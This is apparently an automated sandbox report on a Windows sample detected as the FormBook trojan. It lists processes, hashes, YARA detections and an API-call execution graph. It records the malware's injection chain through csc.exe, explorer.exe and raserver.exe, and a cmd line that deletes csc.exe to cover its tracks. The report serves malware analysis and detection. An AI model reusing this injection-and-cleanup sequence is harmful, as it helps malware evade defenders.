                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:05:35 UTC
                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                Server: Squarespace
                                                                                                                                                                                                                                                                                X-Contextid: SXdSXF3L/N18FwJo2
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px;
Oct 8, 2024 16:05:35.847323895 CEST | 1084 | IN |
                                                                                                                                                                                                                                                                                Data Ascii: font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "Helvetica Neue", Helv


                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                Start time:10:01:30
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\kHslwiV2w6.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\kHslwiV2w6.exe"
                                                                                                                                                                                                                                                                                Imagebase:0x7ff72f5a0000
                                                                                                                                                                                                                                                                                File size:1'627'744 bytes
                                                                                                                                                                                                                                                                                MD5 hash:3364DC2488F8444000A9DA4C6D999FC4
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                                Start time:10:01:30
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                Imagebase:0x7ff7b2f40000
                                                                                                                                                                                                                                                                                File size:875'008 bytes
                                                                                                                                                                                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                Start time:10:01:30
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):
                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                                                                                                                                Imagebase:
                                                                                                                                                                                                                                                                                File size:839'632 bytes
                                                                                                                                                                                                                                                                                MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                Start time:10:01:31
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                                                                                                                                                File size:2'141'552 bytes
                                                                                                                                                                                                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                Start time:10:01:31
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                Imagebase:0x7ff763ff0000
                                                                                                                                                                                                                                                                                File size:4'849'904 bytes
                                                                                                                                                                                                                                                                                MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                Start time:10:01:35
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\raserver.exe"
                                                                                                                                                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                                                                                                                                                File size:107'520 bytes
                                                                                                                                                                                                                                                                                MD5 hash:D1053D114847677185F248FF98C3F255
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                Start time:10:01:38
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                                                                                                                                                Imagebase:0x6a0000
                                                                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                Start time:10:01:38
                                                                                                                                                                                                                                                                                Start date:08/10/2024
                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                Imagebase:0x7ff7b2f40000
                                                                                                                                                                                                                                                                                File size:875'008 bytes
                                                                                                                                                                                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                Has exited:true


                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                  Execution Coverage:5.2%
                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                  Signature Coverage:25.2%
                                                                                                                                                                                                                                                                                  Total number of Nodes:944
                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:46
29360->29361 29362 7ff72f5b30c4 29361->29362 29363 7ff72f5ac1a0 18 API calls 29362->29363 29364 7ff72f5b30f2 29363->29364 29365 7ff72f5ac1a0 18 API calls 29364->29365 29366 7ff72f5b3120 29365->29366 29367 7ff72f5ac1a0 18 API calls 29366->29367 29368 7ff72f5b314e 29367->29368 29369 7ff72f5ac1a0 18 API calls 29368->29369 29370 7ff72f5b317c 29369->29370 29371 7ff72f5ac1a0 18 API calls 29370->29371 29372 7ff72f5b31a5 29371->29372 29373 7ff72f5ac1a0 18 API calls 29372->29373 29374 7ff72f5b31d3 29373->29374 29375 7ff72f5ac1a0 18 API calls 29374->29375 29376 7ff72f5b31fc 29375->29376 29377 7ff72f5ac1a0 18 API calls 29376->29377 29378 7ff72f5b3225 29377->29378 29379 7ff72f5ac1a0 18 API calls 29378->29379 29380 7ff72f5ab845 29379->29380 29381 7ff72f5b1460 GetSystemInfo 29380->29381 29382 7ff72f5b14a4 29381->29382 29383 7ff72f5b14a8 GetNumaHighestNodeNumber 29382->29383 29384 7ff72f5b14ce GetCurrentProcess GetProcessGroupAffinity 29382->29384 29383->29384 29385 7ff72f5b14b7 29383->29385 29386 7ff72f5b14f9 GetLastError 29384->29386 29387 7ff72f5b1504 29384->29387 29385->29384 29386->29387 29388 7ff72f5b1526 29387->29388 29420 7ff72f5b1240 GetLogicalProcessorInformationEx GetLastError GetLogicalProcessorInformationEx 29387->29420 29390 7ff72f5b1590 GetCurrentProcess GetProcessAffinityMask 29388->29390 29391 7ff72f5ab84a 29388->29391 29390->29391 29391->29189 29391->29194 29393 7ff72f5ac0f4 29392->29393 29394 7ff72f5ac0f8 29393->29394 29395 7ff72f5aced0 8 API calls 29393->29395 29394->29248 29396 7ff72f5ac124 29395->29396 29396->29248 29398 7ff72f5ac2df 29397->29398 29399 7ff72f5ac1ca 29397->29399 29402 7ff72f5aced0 8 API calls 29398->29402 29400 7ff72f5ac1ef 29399->29400 29401 7ff72f5ac1d7 strcmp 29399->29401 29404 7ff72f5ac20f 29400->29404 29405 7ff72f5ac1fc strcmp 29400->29405 29401->29400 29408 7ff72f5ac1e7 29401->29408 29403 7ff72f5ac2f6 29402->29403 29403->29408 29419 7ff72f5ad050 _stricmp strtoull 29403->29419 29406 7ff72f5ac22f 29404->29406 29407 7ff72f5ac21c strcmp 
29404->29407 29405->29404 29405->29408 29409 7ff72f5ac24f 29406->29409 29410 7ff72f5ac23c strcmp 29406->29410 29407->29406 29407->29408 29408->29273 29412 7ff72f5ac273 29409->29412 29413 7ff72f5ac25c strcmp 29409->29413 29410->29408 29410->29409 29414 7ff72f5ac280 strcmp 29412->29414 29415 7ff72f5ac297 29412->29415 29413->29408 29413->29412 29414->29408 29414->29415 29416 7ff72f5ac2a4 strcmp 29415->29416 29417 7ff72f5ac2bb 29415->29417 29416->29408 29416->29417 29417->29398 29418 7ff72f5ac2c8 strcmp 29417->29418 29418->29398 29418->29408 29419->29408 29420->29388 29425 7ff72f60b610 29421->29425 29424 7ff72f5b0860 InitializeCriticalSectionEx 29424->29206 29426 7ff72f60b62a malloc 29425->29426 29427 7ff72f5a5ae5 29426->29427 29428 7ff72f60b61b 29426->29428 29427->29204 29427->29424 29428->29426 29429 7ff72f60b63a 29428->29429 29430 7ff72f60b645 29429->29430 29434 7ff72f60b924 RtlPcToFileHeader RaiseException 29429->29434 29435 7ff72f60b944 RtlPcToFileHeader RaiseException 29430->29435 29433 7ff72f60b64b 29435->29433 29436->29217 29474 7ff72f5b3d70 29437->29474 29439 7ff72f5ac44b 29439->29232 29440 7ff72f5b9340 29439->29440 29483 7ff72f5b0130 29440->29483 29444 7ff72f5b935a 29447 7ff72f5b93fc 29444->29447 29490 7ff72f5b1010 29444->29490 29446 7ff72f5b9442 29446->29233 29447->29446 29448 7ff72f5b94e9 29447->29448 29528 7ff72f5b1200 9 API calls 29447->29528 29459 7ff72f5b9598 29448->29459 29504 7ff72f5d1560 29448->29504 29450 7ff72f5b9527 29450->29448 29529 7ff72f5b1200 9 API calls 29450->29529 29453 7ff72f5b9634 29454 7ff72f60ac48 3 API calls 29453->29454 29453->29459 29455 7ff72f5b969a 29454->29455 29455->29459 29530 7ff72f5b0c50 29455->29530 29457 7ff72f5b96bd 29457->29459 29535 7ff72f5cfdd0 16 API calls 29457->29535 29459->29233 29461 7ff72f5a5732 29460->29461 29462 7ff72f5a576d 29461->29462 29646 7ff72f5b0700 CreateEventW 29461->29646 29462->29235 29464 7ff72f5a5744 29464->29462 29647 7ff72f5aba80 CreateThread 29464->29647 29466 7ff72f5a5763 29466->29235 29468 
7ff72f5adb07 29467->29468 29469 7ff72f5adb0f 29468->29469 29470 7ff72f60ac48 3 API calls 29468->29470 29469->29236 29472 7ff72f5adb41 29470->29472 29473 7ff72f5adbd5 29472->29473 29650 7ff72f5b41d0 29472->29650 29473->29236 29479 7ff72f5b4aa0 29474->29479 29477 7ff72f5b3daf 29477->29439 29480 7ff72f60ac48 3 API calls 29479->29480 29481 7ff72f5b3d98 29480->29481 29481->29477 29482 7ff72f5b65d0 malloc RtlPcToFileHeader RaiseException 29481->29482 29482->29477 29484 7ff72f5b01dc 29483->29484 29486 7ff72f5b016b 29483->29486 29489 7ff72f5b1650 QueryPerformanceFrequency 29484->29489 29486->29484 29488 7ff72f5b01a4 29486->29488 29536 7ff72f5afe50 GetCurrentThreadId malloc RtlPcToFileHeader RaiseException 29486->29536 29488->29484 29537 7ff72f5b01f0 malloc RtlPcToFileHeader RaiseException 29488->29537 29489->29444 29491 7ff72f5b1045 29490->29491 29492 7ff72f5b1048 GetCurrentProcess IsProcessInJob 29490->29492 29491->29492 29493 7ff72f5b1120 29492->29493 29494 7ff72f5b1079 29492->29494 29496 7ff72f5b1130 GlobalMemoryStatusEx 29493->29496 29497 7ff72f5b1159 29493->29497 29494->29493 29495 7ff72f5b1083 QueryInformationJobObject 29494->29495 29495->29493 29501 7ff72f5b10a5 29495->29501 29496->29497 29498 7ff72f5b1179 GlobalMemoryStatusEx 29497->29498 29500 7ff72f5b116c 29497->29500 29498->29500 29499 7ff72f5b10e9 GlobalMemoryStatusEx 29499->29493 29538 7ff72f60acf0 8 API calls 29500->29538 29501->29493 29501->29499 29503 7ff72f5b11bb 29503->29447 29505 7ff72f5d157d 29504->29505 29539 7ff72f5b16a0 VirtualAlloc 29505->29539 29507 7ff72f5d15f6 29542 7ff72f5b1440 InitializeCriticalSection 29507->29542 29508 7ff72f5d15a3 29508->29507 29616 7ff72f5b1440 InitializeCriticalSection 29508->29616 29511 7ff72f5d1602 29512 7ff72f5d1a28 29511->29512 29543 7ff72f5e2260 29511->29543 29512->29453 29514 7ff72f5d186f 29514->29453 29515 7ff72f5d1631 29515->29514 29553 7ff72f5d1260 29515->29553 29517 7ff72f5d1804 29557 7ff72f5b17b0 29517->29557 29519 7ff72f5d183e 29519->29514 29560 7ff72f5d1a50 
29519->29560 29521 7ff72f5d1860 29522 7ff72f5d1864 29521->29522 29524 7ff72f5d1893 29521->29524 29617 7ff72f5b1790 VirtualFree 29522->29617 29524->29514 29578 7ff72f5e4e60 29524->29578 29528->29450 29529->29448 29531 7ff72f60ac48 3 API calls 29530->29531 29532 7ff72f5b0c76 29531->29532 29533 7ff72f5b0c7e CreateEventW 29532->29533 29534 7ff72f5b0ca0 29532->29534 29533->29534 29534->29457 29535->29459 29536->29488 29537->29484 29538->29503 29540 7ff72f5b16c1 VirtualFree 29539->29540 29541 7ff72f5b16d9 29539->29541 29540->29508 29541->29508 29542->29511 29544 7ff72f5e228f 29543->29544 29545 7ff72f5e22b2 29544->29545 29546 7ff72f5e22bc 29544->29546 29551 7ff72f5e22e7 29544->29551 29618 7ff72f5b1830 18 API calls 29545->29618 29548 7ff72f5b17b0 3 API calls 29546->29548 29550 7ff72f5e22cd 29548->29550 29549 7ff72f5e22ba 29549->29550 29550->29551 29619 7ff72f5b1790 VirtualFree 29550->29619 29551->29515 29555 7ff72f5d127f 29553->29555 29556 7ff72f5d129c 29555->29556 29620 7ff72f5b0d10 GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 29555->29620 29556->29517 29558 7ff72f5b17d5 VirtualAlloc 29557->29558 29559 7ff72f5b17f4 GetCurrentProcess VirtualAllocExNuma 29557->29559 29558->29559 29559->29519 29561 7ff72f5d1a85 29560->29561 29562 7ff72f5d1aa3 29561->29562 29563 7ff72f5d1a89 29561->29563 29566 7ff72f5d1ae3 EnterCriticalSection 29562->29566 29567 7ff72f5d1b61 29562->29567 29568 7ff72f5d1b10 LeaveCriticalSection 29562->29568 29571 7ff72f5d1c19 LeaveCriticalSection 29562->29571 29572 7ff72f5d1bef 29562->29572 29622 7ff72f5b16e0 29562->29622 29621 7ff72f60acf0 8 API calls 29563->29621 29565 7ff72f5d1a9b 29565->29521 29566->29562 29566->29568 29625 7ff72f60acf0 8 API calls 29567->29625 29568->29562 29575 7ff72f5d1c25 29571->29575 29574 7ff72f5d1bf8 EnterCriticalSection 29572->29574 29572->29575 29573 7ff72f5d1be7 29573->29521 29574->29571 29575->29567 29577 7ff72f5d1c5d EnterCriticalSection LeaveCriticalSection 29575->29577 29626 7ff72f5b1770 
VirtualFree 29575->29626 29577->29575 29627 7ff72f5e4da0 29578->29627 29581 7ff72f5d0c50 29584 7ff72f5d0c75 29581->29584 29582 7ff72f5d1225 29643 7ff72f5b0bb0 CloseHandle 29582->29643 29583 7ff72f5d1231 29586 7ff72f5d1246 29583->29586 29587 7ff72f5d123a 29583->29587 29589 7ff72f5b0c50 4 API calls 29584->29589 29614 7ff72f5d0cdb 29584->29614 29586->29514 29644 7ff72f5b0bb0 CloseHandle 29587->29644 29590 7ff72f5d0d1b 29589->29590 29591 7ff72f5b0c50 4 API calls 29590->29591 29590->29614 29592 7ff72f5d0d31 29591->29592 29592->29614 29631 7ff72f5b0e30 29592->29631 29594 7ff72f5d1050 29595 7ff72f5b0c50 4 API calls 29594->29595 29596 7ff72f5d10cd 29595->29596 29597 7ff72f5d110f 29596->29597 29598 7ff72f5b0c50 4 API calls 29596->29598 29599 7ff72f5d11d1 29597->29599 29600 7ff72f5d11dd 29597->29600 29597->29614 29601 7ff72f5d10e3 29598->29601 29639 7ff72f5b0bb0 CloseHandle 29599->29639 29603 7ff72f5d11e6 29600->29603 29604 7ff72f5d11f2 29600->29604 29601->29597 29638 7ff72f5b0bd0 CreateEventW malloc RtlPcToFileHeader RaiseException 29601->29638 29640 7ff72f5b0bb0 CloseHandle 29603->29640 29606 7ff72f5d11fb 29604->29606 29607 7ff72f5d1207 29604->29607 29641 7ff72f5b0bb0 CloseHandle 29606->29641 29608 7ff72f5d1210 29607->29608 29607->29614 29642 7ff72f5b0bb0 CloseHandle 29608->29642 29612 7ff72f5d10f9 29612->29597 29613 7ff72f5b0c50 4 API calls 29612->29613 29613->29597 29614->29582 29614->29583 29615 7ff72f5d11ae 29614->29615 29615->29514 29616->29507 29617->29514 29618->29549 29619->29551 29620->29556 29621->29565 29623 7ff72f5b171e GetCurrentProcess VirtualAllocExNuma 29622->29623 29624 7ff72f5b16fb VirtualAlloc 29622->29624 29623->29562 29624->29562 29625->29573 29626->29575 29628 7ff72f5e4db9 29627->29628 29630 7ff72f5d1a07 29627->29630 29629 7ff72f5e4dd0 GetEnabledXStateFeatures 29628->29629 29628->29630 29629->29630 29630->29581 29632 7ff72f5b0f1f GlobalMemoryStatusEx 29631->29632 29633 7ff72f5b0e67 GetCurrentProcess 29631->29633 29636 7ff72f5b0e88 29632->29636 29634 
